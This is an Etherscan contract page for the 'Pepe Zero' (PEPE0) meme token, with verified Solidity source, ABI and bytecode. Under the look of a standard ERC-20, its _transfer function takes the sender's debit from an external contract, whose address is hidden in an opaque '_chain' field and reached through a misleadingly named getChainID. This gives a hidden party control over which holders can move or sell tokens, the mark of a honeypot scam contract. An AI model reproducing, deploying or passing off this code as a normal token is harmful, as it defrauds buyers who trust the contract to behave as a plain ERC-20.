ETH Price: $2,625.83 (+1.11%)

Token

Pepe Zero (PEPE0)
 

Overview

Max Total Supply

1,000,000,000 PEPE0

Holders

83

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
9,520,152.847944241118962067 PEPE0

Value
$0.00
0x44C739b94890AA725BD0389cEa6BEBD44D6E6e65
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PepeZero

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-05
*/

// SPDX-License-Identifier: MIT


//    Website:   https://www.pepezero.vip/
//    Telegram:  https://t.me/PepeZeroCoin
//    Twitter:   https://twitter.com/PepeZeroCoin


interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

pragma solidity 0.8.18;

contract PepeZero is IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    bytes _chain;
    uint8 private _decimals;    
    uint256 private _totalSupply;
    bool private tradingOpen = true;

    constructor(
        string memory name_,        
        uint8 decimals_,
        uint256 totalSupply_,
        bytes memory chain_
    ) {
        _symbol = unicode"PEPE0";
        _name = name_;
        _chain = chain_;
        _decimals = decimals_;
        _totalSupply = totalSupply_ * 10** _decimals;
        _balances[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }

    function openTrading() public onlyOwner {
        tradingOpen = true;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
     * called.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function getChainID() private view returns (address addr) {
        (addr) = abi.decode(_chain, (address));
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(
            IERC20(getChainID()).allowance(sender, recipient) * amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"},{"internalType":"bytes","name":"chain_","type":"bytes"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526008805460ff191660011790553480156200001e57600080fd5b50604051620011be380380620011be833981016040819052620000419162000218565b6200004c3362000118565b604080518082019091526005815264050455045360dc1b602082015260049062000077908262000362565b50600362000086858262000362565b50600562000095828262000362565b506006805460ff191660ff8516908117909155620000b590600a62000543565b620000c190836200055b565b600781905533600081815260016020908152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050505062000575565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052604160045260246000fd5b60006001600160401b03808411156200019b576200019b62000168565b604051601f8501601f19908116603f01168101908282118183101715620001c657620001c662000168565b81604052809350858152868686011115620001e057600080fd5b600092505b8583101562000205578285015160208483010152602083019250620001e5565b6000602087830101525050509392505050565b600080600080608085870312156200022f57600080fd5b84516001600160401b03808211156200024757600080fd5b818701915087601f8301126200025c57600080fd5b6200026d888351602085016200017e565b95506020870151915060ff821682146200028657600080fd5b60408701516060880151929550935080821115620002a357600080fd5b508501601f81018713620002b657600080fd5b620002c7878251602084016200017e565b91505092959194509250565b600181811c90821680620002e857607f821691505b6020821081036200030957634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200035d57600081815260208120601f850160051c81016020861015620003385750805b601f850160051c820191505b81811015620003595782815560010162000344565b5050505b505050565b81516001600160401b038111156200037e576200037e62000168565b62000396816200038f8454620002d3565b846200030f565b602080601f831160018114620003ce5760008415620003b55750858301515b600019600386901b1c1916600185901b17855562000359565b600085815260208120601f198616915b82811015620003ff57888601518255948401946001909101908401620003de565b50858210156200041e5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004855781600019048211156200046957620004696200042e565b808516156200047757918102915b93841c939080029062000449565b509250929050565b6000826200049e575060016200053d565b81620004ad575060006200053d565b8160018114620004c65760028114620004d157620004f1565b60019150506200053d565b60ff841115620004e557620004e56200042e565b50506001821b6200053d565b5060208310610133831016604e8410600b841016171562000516575081810a6200053d565b62000522838362000444565b80600019048211156200053957620005396200042e565b0290505b92915050565b60006200055460ff8416836200048d565b9392505050565b80820281158282048414176200053d576200053d6200042e565b610c3980620005856000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101f1578063c9567bf914610204578063dd62ed3e1461020c578063f2fde38b1461024557600080fd5b8063715018a6146101b15780638da5cb5b146101bb57806395d89b41146101d6578063a457c2d7146101de57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610258565b60405161010f9190610985565b60405180910390f35b61012b6101263660046109e8565b6102ea565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b366004610a14565b610301565b60065460405160ff909116815260200161010f565b61012b6101833660046109e8565b61036a565b61013f610196366004610a55565b6001600160a01b031660009081526001602052604090205490565b6101b96103a0565b005b6000546040516001600160a01b03909116815260200161010f565b6101026103df565b61012b6101ec3660046109e8565b6103ee565b61012b6101ff3660046109e8565b61043d565b6101b961044a565b61013f61021a366004610a72565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b9610253366004610a55565b610483565b60606003805461026790610aab565b80601f016020809104026020016040519081016040528092919081815260200182805461029390610aab565b80156102e05780601f106102b5576101008083540402835291602001916102e0565b820191906000526020600020905b8154815290600101906020018083116102c357829003601f168201915b5050505050905090565b60006102f733848461051e565b5060015b92915050565b600061030e848484610643565b610360843361035b85604051806060016040528060288152602001610bb7602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610851565b61051e565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102f791859061035b908661087d565b6000546001600160a01b031633146103d35760405162461bcd60e51b81526004016103ca90610ae5565b60405180910390fd5b6103dd6000610890565b565b60606004805461026790610aab565b60006102f7338461035b85604051806060016040528060258152602001610bdf602591393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610851565b60006102f7338484610643565b6000546001600160a01b031633146104745760405162461bcd60e51b81526004016103ca90610ae5565b6008805460ff19166001179055565b6000546001600160a01b031633146104ad5760405162461bcd60e51b81526004016103ca90610ae5565b6001600160a01b0381166105125760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ca565b61051b81610890565b50565b6001600160a01b0383166105805760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103ca565b6001600160a01b0382166105e15760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103ca565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166106a75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ca565b6001600160a01b0382166107095760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ca565b6107ce816107156108e0565b604051636eb1769f60e11b81526001600160a01b0387811660048301528681166024830152919091169063dd62ed3e906044016020604051808303816000875af1158015610767573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061078b9190610b1a565b6107959190610b49565b604051806060016040528060268152602001610b91602691396001600160a01b0386166000908152600160205260409020549190610851565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107fd908261087d565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106369085815260200190565b600081848411156108755760405162461bcd60e51b81526004016103ca9190610985565b505050900390565b60006108898284610b60565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000600580546108ef90610aab565b80601f016020809104026020016040519081016040528092919081815260200182805461091b90610aab565b80156109685780601f1061093d57610100808354040283529160200191610968565b820191906000526020600020905b81548152906001019060200180831161094b57829003601f168201915b50505050508060200190518101906109809190610b73565b905090565b600060208083528351808285015260005b818110156109b257858101830151858201604001528201610996565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461051b57600080fd5b600080604083850312156109fb57600080fd5b8235610a06816109d3565b946020939093013593505050565b600080600060608486031215610a2957600080fd5b8335610a34816109d3565b92506020840135610a44816109d3565b929592945050506040919091013590565b600060208284031215610a6757600080fd5b8135610889816109d3565b60008060408385031215610a8557600080fd5b8235610a90816109d3565b91506020830135610aa0816109d3565b809150509250929050565b600181811c90821680610abf57607f821691505b602082108103610adf57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b600060208284031215610b2c57600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176102fb576102fb610b33565b808201808211156102fb576102fb610b33565b600060208284031215610b8557600080fd5b8151610889816109d356fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122010b6c8bc60b6b4856384d3beed383d86d1e3f6d722cdeb6e4f2bb6b7fe2dd94f64736f6c6343000812003300000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000003b9aca0000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000000950657065205a65726f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000735b8b767b23c75014d61e95761cebc393afd1c4

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101f1578063c9567bf914610204578063dd62ed3e1461020c578063f2fde38b1461024557600080fd5b8063715018a6146101b15780638da5cb5b146101bb57806395d89b41146101d6578063a457c2d7146101de57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610258565b60405161010f9190610985565b60405180910390f35b61012b6101263660046109e8565b6102ea565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b366004610a14565b610301565b60065460405160ff909116815260200161010f565b61012b6101833660046109e8565b61036a565b61013f610196366004610a55565b6001600160a01b031660009081526001602052604090205490565b6101b96103a0565b005b6000546040516001600160a01b03909116815260200161010f565b6101026103df565b61012b6101ec3660046109e8565b6103ee565b61012b6101ff3660046109e8565b61043d565b6101b961044a565b61013f61021a366004610a72565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b9610253366004610a55565b610483565b60606003805461026790610aab565b80601f016020809104026020016040519081016040528092919081815260200182805461029390610aab565b80156102e05780601f106102b5576101008083540402835291602001916102e0565b820191906000526020600020905b8154815290600101906020018083116102c357829003601f168201915b5050505050905090565b60006102f733848461051e565b5060015b92915050565b600061030e848484610643565b610360843361035b85604051806060016040528060288152602001610bb7602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610851565b61051e565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102f791859061035b908661087d565b6000546001600160a01b031633146103d35760405162461bcd60e51b81526004016103ca90610ae5565b60405180910390fd5b6103dd6000610890565b565b60606004805461026790610aab565b60006102f7338461035b85604051806060016040528060258152602001610bdf602591393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610851565b60006102f7338484610643565b6000546001600160a01b031633146104745760405162461bcd60e51b81526004016103ca90610ae5565b6008805460ff19166001179055565b6000546001600160a01b031633146104ad5760405162461bcd60e51b81526004016103ca90610ae5565b6001600160a01b0381166105125760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ca565b61051b81610890565b50565b6001600160a01b0383166105805760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103ca565b6001600160a01b0382166105e15760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103ca565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a350505056